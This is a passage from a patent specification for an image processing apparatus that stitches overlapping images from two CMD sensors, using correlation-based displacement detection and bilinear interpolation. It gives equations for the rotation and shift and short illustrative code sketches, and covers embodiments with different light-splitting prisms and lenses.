FIG. 86 is a block diagram of the processing section used in the imaging section shown in FIG. 84;
FIGS. 87A and 87B are a timing chart representing the timing of light-emission at the stroboscopic lamp incorporated in the electronic camera shown in FIG. 84;
FIG. 88 is a cross-sectional side view of the imaging section of an electronic camera which is a twenty-sixth embodiment of the invention;
FIG. 89 is a timing chart explaining how the mirror is intermittently driven in the imaging section shown in FIG. 88;
FIGS. 90A and 90B are cross-sectional side views of the imaging section of an electronic camera which is a twenty-seventh embodiment of the invention, and FIG. 90C is a chart representing the timing of exposure performed in the imaging section of FIGS. 90A and 90B;
FIG. 90D is a cross-sectional view of the cam of FIG. 90A;
FIG. 90E is a plan view of the screw of FIG. 90B;
FIG. 91 is a block diagram illustrating the imaging section of an electronic camera which is a twenty-eighth embodiment of the invention;
FIG. 92 is a block diagram showing an ultrasonic diagnosis apparatus which is a twenty-ninth embodiment of this invention and which is a modification of the embodiment shown in FIG. 91;
FIG. 93 is a block diagram showing the imaging section of the twenty-ninth embodiment;
FIG. 94 is a diagram showing a convex-type ultrasonic image;
FIGS. 95A and 95B are diagrams explaining how to combine two images in the twenty-ninth embodiment of the invention;
FIG. 96 is a diagram showing how to synthesize an image;
FIGS. 97A, 97B, and 97C are diagrams illustrating the imaging section of an electronic camera which is a thirtieth embodiment of the present invention;
FIG. 98 is a block diagram showing an apparatus for reproducing the image taken by the imaging section shown in FIGS. 97A, 97B, and 97C;
FIG. 99 is a block diagram showing, in detail, the image-synthesizing circuit incorporated in the apparatus of FIG. 98;
FIG. 100 is a diagram explaining how three images overlap and how the coefficients for the overlap regions change;
FIG. 101 is a block diagram illustrating the image-adding section incorporated in the imaging section of FIG. 97C;
FIG. 102 is a block diagram showing an electronic camera which is a thirty-first embodiment of the invention;
FIG. 103 is a diagram showing the field of the view finder of the camera illustrated in FIG. 102;
FIG. 104A is a diagram explaining how to combine a plurality of images into a wide image in a thirty-second embodiment of the invention;
FIG. 104B is a diagram showing the field of the view finder of the camera used in the thirty-second embodiment;
FIGS. 105A and 105B are side views showing an electronic camera which is a thirty-third embodiment of the invention and which is used to read data from a flat original;
FIG. 106 is a block diagram showing an image processing apparatus according to a thirty-fourth embodiment of the present invention;
FIG. 107 is a plan view showing the photosensitive film used in the apparatus of FIG. 106;
FIG. 108 is a diagram illustrating an address signal recorded on the magnetic tracks of the film shown in FIG. 107;
FIGS. 109A, 109B, and 109C are diagrams showing the positions which recorded images assume on the imaging area of the film;
FIG. 110 is a block diagram showing an image processing apparatus according to a thirty-fifth embodiment of the present invention;
FIG. 111 is a perspective view showing the imaging section of the apparatus shown in FIG. 110;
FIG. 112 is a block diagram showing an image processing apparatus according to a thirty-sixth embodiment of the present invention;
FIG. 113 is a diagram illustrating an address signal recorded on the magnetic tracks of the film used in the apparatus of FIG. 112;
FIGS. 114A and 114B are a block diagram showing an image processing apparatus according to a thirty-seventh embodiment of the present invention;
FIG. 115 is a diagram showing the interpolation circuit incorporated in the apparatus of FIG. 114;
FIG. 116A is a diagram showing the reference areas used for detecting the displacement of a G image;
FIG. 116B is a diagram showing areas which are searched for that part of an R or B image which corresponds to a predetermined part of the G image;
FIG. 117 is a diagram illustrating displacement vectors detected and processed in the thirty-seventh embodiment;
FIG. 118 is a diagram showing, in detail, one of the identical correlation circuits used in the apparatus of FIG. 114;
FIG. 119 is a diagram explaining how a pixel value is interpolated in the apparatus of FIG. 114;
FIG. 120 is a diagram showing, in detail, one of the identical coefficient calculators incorporated in the apparatus of FIG. 114;
FIG. 121 is a diagram showing, in detail, one of the identical coefficient memories of the apparatus shown in FIG. 114;
FIG. 122 is a diagram showing an imaging area in which an R image, a G image, and a B image overlap one another;
FIGS. 123A and 123B are a block diagram illustrating an image processing apparatus according to a thirty-eighth embodiment of the invention;
FIG. 124 is a diagram showing a coefficient calculator incorporated in an image processing apparatus according to a thirty-ninth embodiment of the present invention;
FIG. 125 is a diagram showing a coefficient memory used in the thirty-ninth embodiment; and
FIG. 126 is a diagram illustrating one of the L×L blocks of an image.

DETAILED DESCRIPTION OF THE PREFERRED EMBODIMENTS
The basic structure and operation of an image processing apparatus according to the present invention will be described with reference to FIGS. 4A and 4B and FIGS. 5A and 5B.

As FIG. 4A shows, the apparatus comprises a light-splitting section 1, an imaging section 2, an image-storing section 3, a displacement-detecting section 4, an interpolation section 5, an objective lens 6, an image-synthesizing section 7, and a display section 31. The imaging section 2 has two CMDs (Charge Modulation Devices) 8 and 9, i.e., solid-state imaging devices. As shown in FIG. 4B, the CMDs 8 and 9 are positioned with such precision that they receive two parts of the optical image which overlap in part.

In operation, the objective lens 6 applies an optical image of an object (not shown) to the light-splitting section 1. The section 1 splits the input light into two parts representing two parts of the image which overlap in part. The parts of the image are applied to the CMDs 8 and 9 of the imaging section 2. The CMDs 8 and 9 convert the image parts into image signals, which are supplied to the image-storing section 3. The section 3, e.g., a frame memory, temporarily stores the image signals. Then, the displacement-detecting section 4 detects the positional relation between one of the pixels of either CMD and the corresponding pixel of the screen of the display section 31, from the image signal read from the image-storing section 3 and representing the overlap regions d of the two image parts shown in FIG. 5A, wherein the black dots indicate the pixels of the CMDs and the white dots indicate the pixels of the display screen. More specifically, the section 4 performs correlation on the value of each CMD pixel, thereby calculating two conversion factors, i.e., rotation angle R and displacement S.

In accordance with the conversion factors, the interpolation section 5 interpolates the value of each screen pixel from the values of the CMD pixels located near the screen pixel, thereby producing an interpolated pixel signal representing the screen pixel. Thus, the interpolation section 5 outputs the interpolated pixel signals representing all pixels of the display section 31 to the image-synthesizing section 7. The image-synthesizing section 7 combines the image signals produced by the interpolation section 5 with the image signals read from the image-storing section 3, thereby generating image signals which represent a single continuous image of the object. These image signals are supplied to the display section 31. The section 31 displays a high-resolution image of the object.

Schematically shown in FIG. 5A are the imaging area a (i.e., an M×N pixel matrix) of the CMD 8, the imaging area b (i.e., an M×N pixel matrix) of the CMD 9, and the display area c of the display section 31. As is evident from FIG. 5A, the display area c is a (u+v)×w pixel matrix and is completely covered with the imaging areas a and b, which overlap at regions d. In the instance shown in FIG. 5A, each pixel of the display area c assumes the same position as the corresponding pixel of the imaging area a.

As has been described, the displacement-detecting section 4 detects the positional relation (i.e., rotation angle R and displacement S) between each pixel of the imaging area b and the corresponding pixel of the display area c, from the image signals read from the image-storing section 3 and representing the overlap regions d. To detect the positional relation, the section 4 needs the values of the pixels d_11, d_21, . . . , d_(u+v)w of the display area c, all indicated by white dots.
For the values of the pixels d_ij (i=1 to u, j=1 to w) of the display area c, the values of the pixels of the CMD 8 are utilized. The value for each of the remaining pixels A of the display area c, i.e., the pixels d_ij (i=u+1 to u+v, j=1 to w), is interpolated from the values of the four pixels B, C, D, and E of the imaging area b which surround the pixel d_ij, as is illustrated in FIG. 5B.

In order to calculate the value for any desired pixel of the display area c, it suffices to position the CMDs 8 and 9 with such precision that their imaging areas a and b completely cover the display area c of the display section 31 and overlap in part appropriately. Even if the pixels of either imaging area are deviated from the corresponding pixels of the display area c by a distance of several pixels, the apparatus can form a high-resolution single image of an object. It is therefore not necessary to position the CMDs 8 and 9 with high precision on the order of a one-pixel distance as in the conventional image processing apparatus. Hence, the image processing apparatus according to the invention can be easily manufactured, and its manufacturing cost can be low.

An image processing apparatus, which is a first embodiment of the invention, will now be described with reference to FIGS. 6 to 12. The apparatus has a half prism 1a comprised of two right-angle prisms connected together. Two CMDs 8 and 9 (i.e., two-dimensional solid-state imaging devices) are mounted on the top and back of the half prism 1a, respectively. The CMDs 8 and 9 are positioned such that their imaging areas overlap in part. To the half prism 1a, an optical system 6 applies light which represents an image of an object (not shown). The half prism 1a splits the input light into two parts. The parts of the input light are applied to the CMDs 8 and 9. Each of the CMDs 8 and 9 converts the input light into an image signal, under the control of a CMD driver 32.

The image signals output by the CMDs 8 and 9 are supplied to pre-amplifiers 10 and 11, which amplify the signals. Low-pass filters (LPFs) 12 and 13 remove noise components from the amplified image signals. The signals output by the filters 12 and 13 are input to A/D converters 14 and 15, respectively. The A/D converters 14 and 15 convert the input signals into digital image signals, which are supplied to subtracters 16 and 17. The FPNs (Fixed Pattern Noises) of the CMDs 8 and 9, stored in FPN memories 18 and 19, are supplied to the subtracters 16 and 17, respectively. The subtracter 16 subtracts the FPN of the CMD 8 from the image signal output from the A/D converter 14. Similarly, the subtracter 17 subtracts the FPN of the CMD 9 from the image signal output from the A/D converter 15. The image signals output by the subtracters 16 and 17 are input to signal processors (SPs) 20 and 21, which perform γ correction or outline emphasis on the input image signals. The image signals processed by the processors 20 and 21 are stored into frame memories 22 and 23, respectively.

At a proper time, the image signals are read from the frame memories 22 and 23 and supplied to a displacement-detecting circuit 24. The circuit 24 detects the displacement of the overlap regions of the imaging areas of the CMDs 8 and 9. The displacement is defined by two conversion factors R and S. The factor R represents the rotation matrix which one CMD imaging area has with respect to the other CMD imaging area.
The factor S represents the displacement vector which results from a parallel movement of one CMD imaging area with respect to the other CMD imaging area. The displacement, or the conversion factors R and S, is supplied from the circuit 24 to an interpolation circuit 25. The circuit 25 interpolates the pixel values read from the frame memory 23 in accordance with the conversion factors R and S. The pixel values, thus interpolated, are input to a parallel-serial (PS) converter 29, along with the signals read from the frame memory 22. The converter 29 converts the pixel values and the signals into serial signals. The serial signals are written into a frame memory 30 and read therefrom to a display section 31. The display section 31 displays a high-resolution single image of the object. The image processing apparatus has a system controller 33. The controller 33 controls the FPN memories 18 and 19, the frame memories 22 and 23, the interpolation circuit 25, the PS converter 29, and the CMD driver 32.

The displacement-detecting circuit 24 and the interpolation circuit 25 will be described in detail with reference to FIG. 7. The displacement-detecting circuit 24 comprises correlators 24a and 24b and a coefficient calculator 24c. The correlators 24a and 24b receive the image signals read from the frame memories 22 and 23, respectively, and perform correlation on the input image signals. The image signals, thus processed, are input to the coefficient calculator 24c. The calculator 24c detects the displacement of the overlap regions of the CMD imaging areas, i.e., the conversion factors R and S.

The conversion factors R and S are stored into the memories 26 and 27 incorporated in the interpolation circuit 25. In the interpolation circuit 25, the factors R and S read from the memories 26 and 27 are input to a coordinates-converting circuit 35. The coordinates value X_1 of the point designated by the system controller 33 is input via a coordinates selector 34 to the coordinates-converting circuit 35. The circuit 35 converts the coordinates value X_1 into a coordinates value X_2, using the conversion factors R and S, in accordance with a predetermined conversion formula (10) which will be described later. The coordinates value X_2 pertains to the imaging area of the CMD 9. The value X_2 is supplied from the coordinates-converting circuit 35 to a data-reading circuit 36 and an interpolation coefficient calculator 37.

From the coordinates value X_2 the data-reading circuit 36 produces pixel values v_b, v_c, v_d, and v_e, which are input to a linear interpolation circuit 38. Meanwhile, the interpolation coefficient calculator 37 calculates interpolation coefficients a, b, c, and d from the coordinates value X_2 and inputs these coefficients to the linear interpolation circuit 38. In the linear interpolation circuit 38, the pixel values v_b, v_c, v_d, and v_e are supplied to four multipliers 39, respectively, and the interpolation coefficients a, b, c, and d are also supplied to the multipliers 39, respectively. The first multiplier 39 multiplies the pixel value v_b by the coefficient a; the second multiplier 39 multiplies the pixel value v_c by the coefficient b; the third multiplier 39 multiplies the pixel value v_d by the coefficient c; and the fourth multiplier 39 multiplies the pixel value v_e by the coefficient d.
Further, in the linear interpolation circuit 38, the outputs of the multipliers 39 are input to an adder 40, which adds the outputs of the multipliers 39, generating an interpolation value v_a.

To obtain the conversion factors R and S, it is required that a reference point be set for the rotation and parallel movement of one of the CMD imaging areas with respect to the other CMD imaging area. In the first embodiment, as FIG. 8 shows, the reference point is the center C_1 of an overlap area 1, i.e., those portions of the imaging areas of the CMDs 8 and 9 which would overlap one another if the CMDs 8 and 9 were positioned precisely. In practice, the CMDs 8 and 9 cannot be positioned precisely, and an overlap area 2, i.e., the mutually overlapping portions of the imaging areas of the CMDs 8 and 9, has a center C_2 which is displaced from the center C_1 by a distance corresponding to the conversion factor S. As can be understood from FIG. 8, the overlap area 2 is rotated around the center C_2 with respect to the overlap area 1 by an angle corresponding to the conversion factor R.

The conversion factors S and R can be obtained from, for example, displacement vectors v_1 and v_2 in the overlap area 1 which are at positions P_1 and P_2, symmetrical with respect to the center C_1. Because of the vector s of the parallel displacement and the vector r of the rotational displacement of the imaging area of the CMD 9 with respect to that of the CMD 8, the vectors v_1 and v_2 are represented by the following equations (1) and (2), respectively:

    v_1 = s + r (1)

    v_2 = s - r (2)

Therefore, the vectors s and r are:

    s = (v_1 + v_2) / 2 (3)

    r = (v_1 - v_2) / 2 (4)

The rotation matrix of the imaging area of the CMD 9 with respect to that of the CMD 8 is represented by the following equation:

    R = | cos θ  -sin θ |
        | sin θ   cos θ | (5)

Angle θ is then found as follows:

    sin θ = |r| / L (6)

In the equation (6), L is a known amount, and the vector r is determined by the equation (4). Hence, angle θ can be found, and the rotation matrix R can also be obtained. The rotation matrix R and the displacement vector S (i.e., the vector of the parallel displacement of the imaging area of the CMD 9), thus calculated from the displacement vectors v_1 and v_2 at the positions P_1 and P_2, are stored as conversion factors R and S in the memories 26 and 27, respectively.

The correlation the correlators 24a and 24b execute on the input image signals may be one of the various types hitherto known. In this embodiment, the correlation is effected as is shown in FIG. 10. That is, the correlator 24a detects the position (x_1, y_1) in the search area S_1 of the CMD 9 where the sum of absolute differences from the reference area r_1 of the CMD 8 is minimum, and the correlator 24b detects the position (x_2, y_2) in the search area S_2 of the CMD 9 where the sum of absolute differences from the reference area r_2 of the CMD 8 is minimum. The coordinates values of these positions, (x_1, y_1) and (x_2, y_2), are input to the coefficient calculator 24c. The calculator 24c performs the operations of the equations (3), (4), (6), and (5) sequentially on the coordinates values (x_1, y_1) and (x_2, y_2), obtaining the rotation matrix R and the displacement vector S. The displacement vector S = (S_x, S_y).
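As an illustration of the arithmetic in the equations (3) to (6), the following sketch (not part of the patent; written here in Java, with hypothetical names) computes the conversion factors from two displacement vectors of the kind measured by the correlators 24a and 24b:

    // Sketch of the coefficient calculator 24c arithmetic, equations (3)-(6).
    // v1 and v2 are displacement vectors measured at the symmetric positions
    // P1 and P2; L is the known distance of P1 from the center C1.
    public final class DisplacementCoefficients {

        public static double[] compute(double[] v1, double[] v2, double L) {
            // Equation (3): parallel displacement s = (v1 + v2) / 2
            double sx = (v1[0] + v2[0]) / 2.0;
            double sy = (v1[1] + v2[1]) / 2.0;

            // Equation (4): rotational displacement r = (v1 - v2) / 2
            double rx = (v1[0] - v2[0]) / 2.0;
            double ry = (v1[1] - v2[1]) / 2.0;

            // Equation (6): sin(theta) = |r| / L
            double theta = Math.asin(Math.hypot(rx, ry) / L);

            // Equation (5): the rotation matrix is fully determined by theta,
            // so returning {Sx, Sy, theta} suffices to reconstruct R.
            return new double[] { sx, sy, theta };
        }
    }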
The operation of the interpolation circuit 25 will now be explained with reference to FIGS. 6 and 7. The interpolation circuit 25 performs linear interpolation on the four pixel values read from the frame memory 23, thereby finding the value of the pixel at the position designated by the system controller 33, as will be described with reference to FIG. 11. First, the value v_a of the pixel A is obtained from the values v_b, v_c, v_d, and v_e of the four pixels B, C, D, and E which are located around the pixel A. More precisely, the values v_f and v_g of the pixels located at the intersections F and G of the vertical line passing through the pixel A with the line BC connecting the pixels B and C and the line DE connecting the pixels D and E are:

    v_f = (n·v_b + m·v_c) / (m + n) (7-a)

    v_g = (n·v_d + m·v_e) / (m + n) (7-b)

where BF = DG = m, and FC = GE = n. Assuming FA = p and AG = q, the value v_a for the pixel A can then be given as:

    v_a = (q·v_f + p·v_g) / (p + q) (8)

If it is assumed that the inter-pixel distance is 1, then m + n = p + q = 1. Hence, from the equations (7-a), (7-b), and (8), the value v_a for the pixel A is calculated as follows:

    v_a = a·v_b + b·v_c + c·v_d + d·v_e (9)

where a = (1-p)(1-m), b = (1-p)m, c = p(1-m), and d = pm. Namely, the pixel value v_a can be obtained directly from m, p, and the values v_b, v_c, v_d, and v_e of the four pixels located around the pixel A.

It will now be explained how to find the values of m and p, with reference to FIG. 12. In the first embodiment, m and p are of such values that the center C_1 of the overlap area 1 of the CMD 8 is considered the origin of the coordinates, the position any pixel assumes in the overlap area 1 is represented by the vector x_1, the center C_2 of the overlap area 2 of the CMD 9 is regarded as the origin of the coordinates, and the position any pixel assumes in the overlap area 2 is represented by the vector x_2. To find m and p, it is necessary to convert the coordinates of the position represented by the vector x_1 into the vector x_2. In other words, coordinate conversion must be carried out. Assuming that x_1 = (i_1, j_1) and x_2 = (i_2, j_2), and that the vectors x_1 and x_2 have different coordinate axes, the vector x_2 will then be given as:

    x_2 = R^(-1) (x_1 - S) (10-a)

where R^(-1) means the rotation by the angle -θ. In terms of the components of the vectors x_1 and x_2, the equation (10-a) changes to:

    i_2 =  cos θ · (i_1 - S_x) + sin θ · (j_1 - S_y)
    j_2 = -sin θ · (i_1 - S_x) + cos θ · (j_1 - S_y) (10-b)

The equation (10-b) shows that the coordinates (i_1, j_1) in the imaging area of the CMD 8 are equivalent to the coordinates (i_2, j_2) in the imaging area of the CMD 9. The notation (i_2, j_2) represents real numbers which define the coordinates of the pixel A shown in FIG. 11. Hence, m and p are given as:

    m = i_2 - (int)i_2
    p = j_2 - (int)j_2 (11)

where the notation (int) means truncation to an integer. Similarly, the coordinates of the pixels B, C, D, and E are represented as follows:

    B = ((int)i_2, (int)j_2)
    C = ((int)i_2 + 1, (int)j_2)
    D = ((int)i_2, (int)j_2 + 1)
    E = ((int)i_2 + 1, (int)j_2 + 1) (12)

The conversion factors R and S calculated as described above are written into the memories 26 and 27 of the interpolation circuit 25 during the manufacture of the image processing apparatus. Thereafter, it is unnecessary for the displacement-detecting circuit 24 to detect the conversion factor R or the conversion factor S. It suffices to read the factors R and S from the memories 26 and 27, respectively, whenever it is required to do so. Therefore, once the conversion factors R and S have been thus stored into the memories 26 and 27 of the interpolation circuit 25, the displacement-detecting circuit 24 is no longer necessary in the image processing apparatus. Stated in another way, a user of the apparatus need not make use of the circuit 24. Usually, the circuit 24 is removed from the apparatus and used again in the factory to detect conversion factors R and S for another apparatus of the same type.
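Before turning to how the apparatus is used, the arithmetic of the equations (9), (11), and (12) can be summarized in the following sketch (again Java with hypothetical names, not the patent's circuitry), covering the work of the data-reading circuit 36, the coefficient calculator 37, and the linear interpolation circuit 38:

    // Sketch of the bilinear interpolation of equations (9), (11) and (12).
    // 'image' stands for the frame memory 23 of the CMD 9, indexed [row][col];
    // (i2, j2) are the real-valued coordinates produced by the coordinate
    // conversion of equation (10).
    public final class LinearInterpolator {

        public static double interpolate(double[][] image, double i2, double j2) {
            int i0 = (int) i2;            // (int)i2 of equation (12)
            int j0 = (int) j2;            // (int)j2 of equation (12)
            double m = i2 - i0;           // equation (11)
            double p = j2 - j0;           // equation (11)

            double vb = image[j0][i0];         // pixel B
            double vc = image[j0][i0 + 1];     // pixel C
            double vd = image[j0 + 1][i0];     // pixel D
            double ve = image[j0 + 1][i0 + 1]; // pixel E

            // Equation (9): va = a*vb + b*vc + c*vd + d*ve
            double a = (1 - p) * (1 - m);
            double b = (1 - p) * m;
            double c = p * (1 - m);
            double d = p * m;
            return a * vb + b * vc + c * vd + d * ve;
        }
    }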
The conversion factors R and S calculated as described above are written into the memories 26 and 27 of the interpolation circuit 25 during the manufacture of the image processing apparatus. Thereafter, it is unnecessary for the displacement-detecting circuit 24 to detect the conversion factor R or the conversion factor S; it suffices to read the factors R and S from the memories 26 and 27, respectively, whenever they are required. Therefore, once the conversion factors R and S have been thus stored into the memories 26 and 27 of the interpolation circuit 25, the displacement-detecting circuit 24 is no longer necessary in the image processing apparatus. Stated in another way, a user of the apparatus need not make use of the circuit 24. Usually, the circuit 24 is removed from the apparatus and used again in the factory to detect the conversion factors R and S for another apparatus of the same type.

It will now be explained how to use the image processing apparatus according to the first embodiment of the invention. First, the user holds the apparatus at a proper position, thus placing the image of the object which he or she wishes to photograph at high resolution within the view field. The user then pushes the shutter-release button of the apparatus, whereby two image signals are stored into the frame memories 22 and 23. These image signals represent those parts of the optical image applied to the imaging areas of the CMDs 8 and 9, respectively.

Next, the image signals are read from the frame memories 22 and 23, ultimately inputting to the frame memory 30 the pixel signals representing the (u+v)×w pixels, i.e., the pixels d_11 to d_(u+v)w arranged in the display area c of the display section 31. As is evident from FIG. 5A, the values of the pixels of the CMD 8 are utilized for those of the pixels d_ij (i=1 to u, j=1 to w) of the display area c. The value for each of the remaining pixels of the display area c, i.e., the pixels d_ij (i=u+1 to u+v, j=1 to w), is interpolated from the values of the four pixels B, C, D, and E of the imaging area b of the CMD 9 which are located around the pixel of the display area c. More precisely, the system controller 33 designates the coordinate value X_1 of any desired pixel d_ij, and this value X_1 is input to the interpolation circuit 25. In the circuit 25, the coordinates selector 34 selects a coordinate value x_1 representing the position the pixel d_ij assumes in the overlap area 1 of the CMD 8. The value x_1, thus selected, is input to the coordinates-converting circuit 35. The circuit 35 calculates the coordinate value x_2 from the coordinate value x_1 pertaining to the imaging area a of the CMD 8, using the conversion factors R and S, in accordance with the equation (10). The coordinate value x_2 is input to both the data-reading circuit 36 and the interpolation coefficient calculator 37.

The data-reading circuit 36 calculates, from the coordinate value x_2, the coordinates of the four pixels B, C, D, and E around the pixel A, in accordance with the equation (12). Then, the circuit 36 reads from the frame memory 23 the pixel values v_b, v_c, v_d, and v_e which correspond to the coordinate values thus calculated, and inputs these pixel values to the linear interpolation circuit 38. The interpolation coefficient calculator 37 calculates m and p from the coordinate value x_2, in accordance with the equation (11), thereby obtaining the interpolation coefficients a, b, c, and d. These coefficients a, b, c, and d are input to the linear interpolation circuit 38.

The linear interpolation circuit 38 interpolates the value v_a of the pixel d_ij from the pixel values v_b, v_c, v_d, and v_e and the interpolation coefficients a, b, c, and d, in accordance with the equation (9). The pixel value v_a, thus calculated, is supplied to the PS converter 29. The values for all other desired pixels d_ij are calculated in the same way and input to the PS converter 29. The PS converter 29 converts the pixel values, which are parallel data, to serial data, i.e., a continuous image signal. The continuous image signal is written at predetermined addresses of the frame memory 30.
The image signal is read from the frame memory 30 and supplied to the display section 31, which displays a high-resolution single image of the object. The value for each pixel d_ij may be output to the display section 31 from the PS converter 29 immediately after it has been interpolated by the interpolation circuit 25. If this is the case, the frame memory 30 can be dispensed with.

As has been described, the image processing apparatus according to the first embodiment of the invention can form a single high-resolution image of an object even if the CMDs 8 and 9 are not positioned precisely, since the interpolation circuit 25 interpolates the value for any desired pixel. Thus, the CMDs 8 and 9 need not be positioned with high precision, whereby the image processing apparatus can be manufactured at low cost. Moreover, since the apparatus has no mechanical movable components, it can be made small and light.

In the first embodiment, the displacement-detecting circuit 24 is incorporated during the manufacture of the apparatus and is removed therefrom after the conversion factors R and S are stored into the memories 26 and 27 of the interpolation circuit 25. Instead, the imaging section of the apparatus can have a connector so that the circuit 24 may be connected to the imaging section or disconnected therefrom. Further, the interpolation circuit 25 is not limited to the type which executes linear interpolation. Rather, the circuit 25 may be one which effects higher-order interpolation, such as spline interpolation or sinc interpolation.

An image processing apparatus, which is a second embodiment of the invention, will be described with reference to FIG. 13. The first embodiment described above must process a considerably large amount of data whenever an image of an object is photographed, performing the calculations based on the equations (9), (10), (11), and (12). The second embodiment is designed not to effect these calculations on the image signals representing each image taken. To be more specific, as shown in FIG. 13, the second embodiment has an interpolation-coefficient writing circuit 28 and an interpolation circuit 25a, which replace the displacement-detecting circuit 24 and the interpolation circuit 25, respectively. The second embodiment is identical to the first in all other respects. Its components identical to those of the first embodiment are therefore designated by the same reference numerals in FIG. 13 and will not be described in detail in the following description.

As shown in FIG. 13, the interpolation-coefficient writing circuit 28 comprises a displacement-detecting circuit 24, a coordinates-converting circuit 35, an interpolation coefficient calculator 37, and a data-address detector 41. The coordinates-converting circuit 35 performs the operation of the equation (10), the interpolation coefficient calculator 37 effects the operations of the equations (11) and (9), and the data-address detector 41 executes the operation of the equation (12). The circuit 37 calculates the interpolation coefficients a, b, c, and d. The detector 41 detects the coordinate value of each pixel. The coefficients a, b, c, and d, and the coordinate value of the pixel, are input to the interpolation circuit 25a. In the interpolation circuit 25a, the coordinate value of the pixel is stored into a data-address memory 42, and the interpolation coefficients a, b, c, and d are stored into four coefficient memories 43, 44, 45, and 46, respectively.
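The division of labor in the second embodiment can be sketched as follows: the heavy computation runs once (the role of the interpolation-coefficient writing circuit 28), and only the equation (9) runs per frame (the role of the circuit 25a). The function names are illustrative, not the patent's.

```python
import numpy as np

def write_tables(positions, R, S):
    """One-time work of circuit 28: for every output pixel position,
    compute the data address (memory 42) and the coefficients a, b, c, d
    (memories 43 to 46), per equations (10)-(12)."""
    addresses, coefficients = [], []
    for x1 in positions:
        i2, j2 = R.T @ (np.asarray(x1, float) - S)   # equation (10)
        i0, j0 = int(np.floor(i2)), int(np.floor(j2))
        m, p = i2 - i0, j2 - j0                      # equation (11)
        addresses.append((j0, i0))                   # equation (12) base pixel
        coefficients.append(((1-p)*(1-m), (1-p)*m, p*(1-m), p*m))
    return addresses, coefficients

def interpolate_frame(frame2, addresses, coefficients):
    """Per-frame work of the linear interpolation circuit 38: equation (9) only."""
    out = np.empty(len(addresses))
    for k, ((j0, i0), (a, b, c, d)) in enumerate(zip(addresses, coefficients)):
        out[k] = (a * frame2[j0, i0]     + b * frame2[j0, i0 + 1] +
                  c * frame2[j0 + 1, i0] + d * frame2[j0 + 1, i0 + 1])
    return out
```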
The circuit 25a further comprises a coordinates selector 34, a data-reading circuit 36b, and a linear interpolation circuit 38. As indicated above, the second embodiment effects the coordinate conversion of the equation (10), the interpolation-coefficient calculation of the equation (11), and the coordinates-value calculation of the equation (12) during the manufacture of the apparatus, and the results of these operations are stored into the data-address memory 42 and the coefficient memories 43 to 46. Hence, it is only the operation of the equation (9) that the linear interpolation circuit 38 needs to accomplish. The use of the data-address memory 42 and the coefficient memories 43 to 46, all incorporated in the interpolation circuit 25a, greatly reduces the amount of data that needs to be processed. This enables the apparatus to process, at sufficiently high speed, the image signals which are sequentially generated by continuous imaging.

In the second embodiment, the interpolation-coefficient writing circuit 28 may be connected to the apparatus only during the manufacture of the apparatus, and may be disconnected therefrom after the operations of the equations (10), (11), and (12) are performed and the results thereof are stored into the data-address memory 42 and the coefficient memories 43 to 46.

An image processing apparatus, which is a third embodiment of this invention, will be described with reference to FIGS. 14A and 14B and FIGS. 15 to 17. The third embodiment is similar to the first embodiment shown in FIG. 6, and the same components as those of the first embodiment are denoted by the same reference numerals in FIG. 17 and will not be described in detail.

In the first and second embodiments, the input light representing the optical image of an object is split into two parts by means of the half prism 1a. The use of the half prism 1a is disadvantageous in that one half of the input light is wasted. In the third embodiment, to avoid wasting the input light, one of the prisms constituting the light-splitting section has a coating on a part of its output surface, as is shown in FIG. 14A. Thus, the portions of the first prism have different transmission coefficients.

FIG. 14A shows an input light flux which is coaxial with the optical axis of the light-splitting section. The upper half (shaded part) of the flux is reflected to a CMD 8 from the coated part of the output surface of the first prism, whereas the lower half of the flux passes through the first prism and the second prism, reaching a CMD 9. On the other hand, FIG. 14B shows an input light flux whose axis deviates upwards from the optical axis of the light-splitting section. A greater upper (shaded) part of the flux is reflected to the CMD 8 from the coated part of the output surface of the first prism, whereas the smaller lower part of the flux passes through the first prism and the second prism, forming a small part of the input image on the upper edge portion of the CMD 9.

The amount of light input to the light-splitting section is proportional to the area of the output aperture of the objective lens. Thus, when the input light flux is coaxial with the optical axis of the light-splitting section, as is shown in FIG. 14A, the light distributions in the imaging areas of the CMDs 8 and 9 are symmetrical with respect to the optical axis of the light-splitting section, as is illustrated in FIG. 15.
As is evident from FIG. 15, the light amount at the optical axis of the light-splitting section is equal to the amount applied to the CMDs through the half prism 1a in the first and second embodiments. The light distributions in the imaging areas of the CMDs 8 and 9 are different, however, particularly in the overlap areas thereof. From such different light distributions, a displacement, if any, of the imaging area of one CMD with respect to that of the other CMD cannot be detected correctly; the displacement detected is erroneous. Further, if the light distributions on the CMDs differ, the image formed by the apparatus will have brightness distortion. In order to prevent such brightness distortion, some measures must be taken to render the light distributions on the CMDs equal.

In the third embodiment, use is made of light-amount correcting circuits 47 and 48, as shown in FIG. 17. These circuits 47 and 48 amplify the input image signals originating from the CMDs 8 and 9, making the light distributions on the CMDs equal to each other, as shown in FIG. 16. In other words, the circuits 47 and 48 apply an inverse function to the different light distributions on the CMDs 8 and 9. The light-amount correcting circuits 47 and 48 may be look-up tables.

The light-splitting section 1b of the third embodiment comprises two prisms. One of the prisms has a coating on a part of its output surface, as is shown in FIG. 14A, and consists of two portions having different transmission coefficients. Consisting of two portions with different transmission coefficients, this prism reduces the loss of input light to a minimum, whereby the apparatus is made suitable for photographing dark objects. In the third embodiment, the prism has two parts whose transmission coefficients differ greatly; it may instead be replaced by a prism which has such a coating that its transmission coefficient gradually changes in one direction.

An image processing apparatus, which is a fourth embodiment of the invention, will be described with reference to FIG. 18 and FIGS. 19A, 19B, and 19C. The fourth embodiment is also similar to the first embodiment (FIG. 6). The components identical to those of the first embodiment are denoted by the same reference numerals in FIG. 18 and will not be described in detail.

FIGS. 19A, 19B, and 19C explain how a light flux applied from an objective lens 6 passes through the separator lenses 1c, forming an image on CMDs 8 and 9 in various manners. To be more specific, FIG. 19A shows a light flux applied through the lenses 1c to the CMDs 8 and 9, exactly along the optical axis of the lens 6. FIG. 19B shows a light flux extending along a line inclined to the optical axis of the objective lens 6, forming an image on the upper edge portion of the CMD 8 only. FIG. 19C shows a light flux extending along a line parallel to and deviating downward from the optical axis of the lens 6, forming an image on the upper edge portion of the CMD 9 only. When the input light flux is applied as shown in FIG. 19A or 19C, the lenses 1c split the flux into two parts, and these parts of the flux form images, which overlap in part, on both CMDs 8 and 9 or on the CMD 9 only. A light shield 50 is arranged between the separator lenses 1c and the CMDs 8 and 9, extending in a horizontal plane containing the optical axis of the lens 6. Hence, the shield 50 prevents mixing of the two flux parts. As can be understood from FIGS. 19B and 19C, the light distributions on the CMDs 8 and 9 will differ unless the light flux is applied along the optical axis of the objective lens 6. The fourth embodiment therefore has two light-amount correcting circuits 47 and 48 of the same type used in the third embodiment 